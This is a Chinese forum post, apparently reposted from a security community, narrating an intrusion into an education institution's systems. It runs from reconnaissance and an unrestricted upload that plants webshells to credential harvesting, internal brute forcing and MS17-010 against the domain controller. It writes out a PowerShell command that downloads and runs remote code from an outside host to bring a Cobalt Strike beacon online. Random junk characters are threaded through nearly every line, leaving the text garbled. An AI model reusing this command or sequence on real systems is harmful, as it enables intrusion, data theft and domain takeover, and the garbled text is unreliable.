|
s2 t1 _- {" U. S2 ?4 P 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路2 t/ f7 X) `& B5 \$ g3 ` _1 _& M
* v# {3 _+ ^& @: r' D5 c
* J; R. l. m0 K0 p7 V% E
- q6 d% e4 D6 X* s1 |
; [) K, `. B. p# T$ A. |
6 @8 y! K! M$ ]- E& R1 t 正文, D7 b8 V; N; g: h7 u" N
; }$ ~% y5 s9 x- H8 k# x+ ?3 G0 ~
" \; M3 D! A& a! C: @( V
5 O4 W5 E0 Y9 i$ n5 w5 \
8 M* R# q8 J9 g$ x" p- K+ E6 ~# ]' F7 @5 A5 g. J1 Z
目标:www.xxxx.com(一家教育机构)
. l% O( C4 Z* ^* I/ d
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能( Y3 p& D6 U, {' r+ e7 j+ Q
) [! @5 x1 u* m
, L' S" g6 U% Z" `  0 ~/ {% ?$ C) u4 ^4 Y. x6 [
! Q1 u& w h$ |
H) e; q$ L5 u 进行了简单的信息搜集
, Q: s; k8 {! |. ^( I
% ]% j: o3 ?! E# m
: C1 K$ m3 r' }4 V0 d
+ Y. f* M. W8 V, G3 K& \( n# H3 s! H8 V: N+ U% V/ V2 J/ i
子域名搜集) N$ N. ?2 A; }: D @5 }
, O& y& h# p$ I, V! \* i! w
' u0 G$ Z% M8 ]% c4 p X6 {4 }  / U8 j( R7 b. ~ d3 f& A" h
. q' R+ R& ?$ q: J+ Q' u
* c! P2 ?; N6 J- }' E
fofa找资产
; Y7 U A! A+ f/ ]( E
, s7 Z/ L7 Z- m) I4 W* R! [" X7 ^% `- Y# h7 w) i4 v" p3 ~
7 g* E1 R# a( a2 i; M: h- P# `4 c j8 h) H' W- W
 : T7 k1 `) G5 B( w- G
1 l! c- @" L/ C, r4 A" d# M$ g; ]( N# Q
一共七个资产。去重之后只有两个。
5 O& u9 S! R+ \; R: L
. I W7 B1 Z3 @ F+ S* A% Z
* L" f# g9 c, h! K! C# L
6 x9 W1 G2 J" t3 o* O/ u
/ b$ T( K1 \8 U' I, I/ L 目录探测( L5 d) P( f% {2 N% H
: [) b% z. h% @( Z! u" S/ K! L# u' L# b: P& L# J( j
 1 K2 U2 B. ~- ]- N4 W" x7 a
( x* ?6 ^% z$ g1 ? u' z3 K
' G4 }- M8 n& C3 p8 t1 V+ i 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
& o2 a* d7 r% @- m7 n% U3 M3 ]
6 z; u* t$ y4 ]
. D+ f) |" Q; ]0 t- ] # W) |* k0 y: E# d
+ Q5 S& t) G- c+ V* Y( C1 K! s' P
我又尝试了通过修改返回包来绕过登录界面 q: E+ E# K( i- K" J4 |, N
# b1 ~( _2 ?5 u% r0 r) R
5 O- D3 h# L! u- \2 i7 c  6 n7 ^9 ^) o0 n# Q$ ]* A2 G
0 B* z" P. G- t& ~& u* A. J* E! ^9 L3 d3 D0 t- F: c
还是不行,尝试注入无果7 ~" W' c( x. `* H* Z; P
4 d2 v# {; p/ F, R! ]9 y
# U8 V+ u5 s- }7 w
 2 ?: a2 o j2 f% D. `' X( Q
( X4 S- R; q8 M- j% @( N* D3 F+ z# Y7 S. q
不过我目录探测出了一处Spring信息泄露
6 J1 I: c! L6 H9 C) U& o+ c
5 ^; F1 K5 C! T# V8 p
r. y9 V. A( P( R 4 S9 Q9 N2 r# C0 A: e
) b, K- K# \" p" q* T3 l
 7 W1 Z/ s& p" @$ Z( E( t
9 O* u$ T W7 t/ W% x6 E; `& {8 q( u' B5 z
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
6 a7 V e$ s4 a& g( s
; K% F5 ^7 T1 O g, x) }
# n2 j. f( g3 c9 q; Y4 e  9 f f8 a7 o7 S- F; {' b! T& I4 j7 F
9 q2 c! j4 ?. F- n! S: D
) ^0 l5 ^& N4 f$ V 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
, N! ] `3 ?: Y/ Y7 y : F4 e1 R$ v) K
. Y2 y9 _- | {; @0 a: D3 `; D7 d4 Y' C  1 R2 S1 v) l. C `+ x4 `! Z& S
) {8 a* n, {) S$ S6 \6 |) i3 ~& P4 ~/ `# V% z
获取有些师傅到这一步就手机抓包电脑测了。* x! i) n' h3 l- P
; t" R7 n6 U( g! y: i1 [. t- X& [' k
" z1 u- }3 p- M( { Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。8 U1 a6 z/ |" [0 G% [" {4 ^
) ]7 c: ~- t. J4 W
/ {! N0 Z3 i+ \/ X7 L" j
其中在一个公众号发现了小程序,可以进行注册。
# C! s" k0 a! @& Z
- G% H$ i) J1 r' b5 o& f% S
T/ y0 f' t. ?9 f 看到了头像上传,尝试上传获取WebShell
8 J" n1 j8 b' g4 H0 U9 R
. `8 P. b1 [$ @( j$ K5 a% _
& ~2 S- }5 V7 @; t( |) s' w: \ 
3 ~0 s9 @& [' m# Y' ^! t : b' C5 d; k2 o4 f( g
' A! ~0 `7 o7 e5 X
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问7 l% ~$ T) \' `1 \; n: R2 Y- i( H! f
- r" h W- ?, K( v1 L
" E( ^3 {) o0 V7 ~
 / \7 V, n7 G7 G5 B K
: R* T; R. _7 P/ o1 B. q# L) |
# b% `( I& P% A& g3 s. r8 k* u
然后上了大马
0 z; o2 j; |$ U+ N' j8 r1 q
% b) a. I5 H3 {$ k& s0 {$ `. _+ F Y2 E% ~* f; ^' {% C
 # g% O3 M8 M5 ]; H6 G7 g
& L& O; K( F' R' }! P4 c6 A( f
# S# E+ s: D9 p* l- K0 v 
! C- H2 A) ?$ K9 O, T, n
, O/ [# B7 z+ @$ H
% E. t. F% F- W: G8 ]; F 通过翻找文件发现数据库账号密码9 ^, s! F* h, t* v
) P; o8 P2 d' v
# x" v# c8 B& M9 ]; X
! D1 c. Z5 r4 Y
' Z6 n" f( F3 S4 A4 T( l
8 g4 H2 m/ z# t* n) I' ^/ O --内网渗透
. S3 F% O/ I7 Q7 ?3 M% P- X * y c# w( q6 g: H9 O0 d: S& f
7 L- x) h4 c1 @
直接通过powershell执行 cs上线
; y" U7 W$ Q3 `" ? F
( Z' H: O8 E9 H) z
! K' L! o9 D0 J0 W8 }+ z8 B2 P powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"7 K3 b, p) o$ _
. q8 p$ c# L9 q/ w/ ` P# I2 d" K& C
 " @: ?: S7 ?/ E0 U) w1 F5 Z' v
$ J" g% Z7 C8 t8 L( d j
) I7 Y/ C8 n- P4 @/ c% L. Y5 C 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
, f+ Q9 e" q! B8 D3 u( t
$ @( @ M, i- {( h- ]& {; q& K; j( t, M$ n
4 M2 A) `& l4 c" G / L& j7 U2 a1 v4 `. e% t
8 K1 I9 {: R6 _9 w# [6 G 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% n; ?$ {6 U1 ?1 g7 f% _0 z
# y* Y7 Z4 l; ?7 n0 G' i- x& Q
7 c3 C4 f& d9 l$ ]5 u3 t9 w q! X* i9 ` Q% E
~2 S0 j- `/ S. O- {( }; r
4 C2 M2 k: i- \ 
2 ?( C0 n; z- W, l
6 n5 C) S( n. R! I& Y2 d! h9 r s8 G4 X2 \
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
" i$ ?3 F$ F; o) z
& d- A3 @% i1 K% O
?2 s( }! u0 l% B5 ~, M! f
" h) G- C# t$ h9 \& ~
. c" s5 V+ u( J( ?8 l 
7 @, k h/ }# S 1 Z$ @% {6 q: t. P
k# Z2 D" R& u' V
+ \: E9 t! r' v v/ O, X% f5 z9 s
. n0 H' U7 |, M4 x& w3 |
, h3 ?9 C* G7 J( a! X1 E# r4 V L5 Y 3 e) x% i! [1 O3 \- X- x# @. N X) b
% m: a$ A: ^0 r* U0 X" x' b3 S
2 d+ l4 _3 r) V
9 J& E, }3 l6 m8 Q" h; S- T, s9 a* F
小结0 p' ^0 B& {, M x2 M ^! C
, v: P5 T( ^- l* {" I$ o0 j
+ S# }( J3 Z! J3 q0 h6 v, q
# ?- }# B' f6 N, v & T# o# I/ r* u2 c& @% r i8 \
3 [! U2 g0 l) T: r% Q' I: D 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!/ [8 `& C5 q# B' F
; \4 Z1 D: x$ A; t5 I3 U9 y/ |5 [5 u1 u7 R) c/ s
' f, k* e2 p0 L# n. h) w
# R5 l6 G; D5 h, \# s% A3 Q9 N# ^4 v0 w1 U
- ) g6 Z' a; Z8 E/ D" Y/ J
p, O3 A g3 r" Q
2 ?5 V- ^5 g3 l
-
. A# }3 i( I% v- c r
) F# O, h" l% w- G6 \
5 U# g3 x2 q$ @2 M% h, V4 u' T
/ a I0 G6 Q0 x2 U' v# [, y. l6 h9 K" b: v) \! \7 y$ e1 b
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html5 O) J* B( E; n' `) t
% s w* b! q4 X# p' l r( v/ b; W, S
7 i5 \+ a& E/ Q0 W3 H' ]( H1 b | 
发表于 2024-3-1 19:41:32
收藏
支持
反对